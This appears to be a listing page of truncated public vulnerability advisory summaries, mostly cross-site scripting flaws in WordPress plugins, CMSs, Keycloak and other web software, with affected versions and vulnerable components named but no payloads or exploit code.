CVE-2022-4105 Cross-site Scripting (XSS) - Stored in kiwitcms/kiwi

A stored XSS in a kiwi Test Plan can run malicious javascript which could be chained with an HTML injection to perform a UI redressing attack clickjacking and an HTML injection which disables the use of the history page...

Code injection

The SVG Support plugin for WordPress defaults to insecure settings in version 2.5 and 2.5.1. SVG files containing malicious javascript are not sanitized. While version 2.5 adds the ability to sanitize image as they are uploaded, the plugin defaults to disable sanitization and does not restrict SV...

CVE-2022-4022

The SVG Support plugin for WordPress defaults to insecure settings in version 2.5 and 2.5.1. SVG files containing malicious javascript are not sanitized. While version 2.5 adds the ability to sanitize image as they are uploaded, the plugin defaults to disable sanitization and does not restrict SV...

PT-2022-25291 · WordPress · Svg Support

Name of the Vulnerable Software and Affected Versions: SVG Support plugin for WordPress versions 2.5 through 2.5.1 Description: The SVG Support plugin for WordPress defaults to insecure settings, allowing authenticated attackers with author-level privileges and higher to upload malicious SVG file...

CVE-2022-3240 Follow Me Plugin <= 3.1.1 - Cross-Site Request Forgery to Cross-Site Scripting

The "Follow Me Plugin" plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1.1. This is due to missing nonce validation on the FollowMeIgniteSocialMediaoptionspage function. This makes it possible for unauthenticated attackers to modify the plugin'...

Cross-site Scripting (XSS)

Concrete CMS is vulnerable to cross-site scripting. The vulnerability exists due to the unsanitized outputs in icons.php, allowing an attacker to inject and execute malicious JavaScript...

Cross-site Scripting (XSS)

tribalsystems/zenario is vulnerable to cross-site scripting attacks. The vulnerability exists due to a lack of sanitization in the adminorganizer.js of the component error log module, allowing an attacker to inject and execute malicious javascript into the system...

CVE-2022-40190

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflective cross-site scripting XSS. The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users’ browsers and steal sensitive...

CVE-2022-40190

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflective cross-site scripting XSS. The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users’ browsers and steal sensitive...

CVE-2022-40190

SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflective cross-site scripting XSS. The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users’ browsers and steal sensitive...

Cross-site Scripting (XSS)

rails is vulnerable to cross-site scriptingXSS attacks. The use of the innerHTML in checkNoMatch function allows a remote authenticated attacker to inject and execute malicious JavaScript on victim's browser...

Cross-Site Scripting (XSS)

rdiffweb is vulnerable to cross-site scripting. The vulnerability exists due to lack of validations in fullname,username and email which allows a remote attacker to inject and execute malicious javascript into the system...

Cross-site Scripting (XSS)

Zinc is vulnerable to cross-site scripting. The vulnerability exists because the delete template functionality in Template.vue incorrectly escapes the name attribute before being rendered, allowing an attacker to inject and execute a malicious JavaScript payload...

Design/Logic Flaw

It was possible to trigger an infinite recursion condition in the error handler when Hermes executed specific maliciously formed JavaScript. This condition was only possible to trigger in dev-mode when asserts were enabled. This issue affects Hermes versions prior to v0.12.0...

Cross-site Scripting (XSS)

github.com/dutchcoders/transfer.sh is vulnerable to cross-site scriptingXSS attacks. The library is unable to determine the content type of the file inserted through ContentType metadata, which allows an attacker to inject and execute malicious javascript on victim's browser...

CVE-2022-1719

Reflected XSS on ticket filter function in GitHub repository polonel/trudesk prior to 1.2.2. This vulnerability is capable of executing a malicious javascript code in web page...

Cross-site Scripting (XSS)

org.keycloak:keycloak-themes is vulnerable to cross-site scriptingXSS attacks. The library does not properly sanitize inputs in certain UI fields in client registration, which allows a malicious authenticated user to inject and execute malicious javascript on the admin console...

Trudesk 跨站脚本漏洞

Chris Brame Trudesk is an open source helpdesk/ticketing solution from Chris Brame USA. A cross-site scripting vulnerability exists in Trudesk versions prior to 1.2.2, which stems from reflected XSS on the ticket filtering functionality, which is capable of executing malicious javascript code in ...

Cross-site Scripting (XSS)

jodit is vulnerable to cross-site scripting. The library does not properly escape specially constructed input through stripTags when a user copy-pastes content from a page controlled by the attacker, which allows malicious javascript execution on victim's browser...

Cross-Site Scripting (XSS)

craftcms/cms is vulnerable to cross-site scripting. The vulnerability exists in the createNewElement function of BaseElementSelectInput.js due to a lack of sanitization in the elementInfo attribute, allowing an attacker to inject and execute malicious javascript...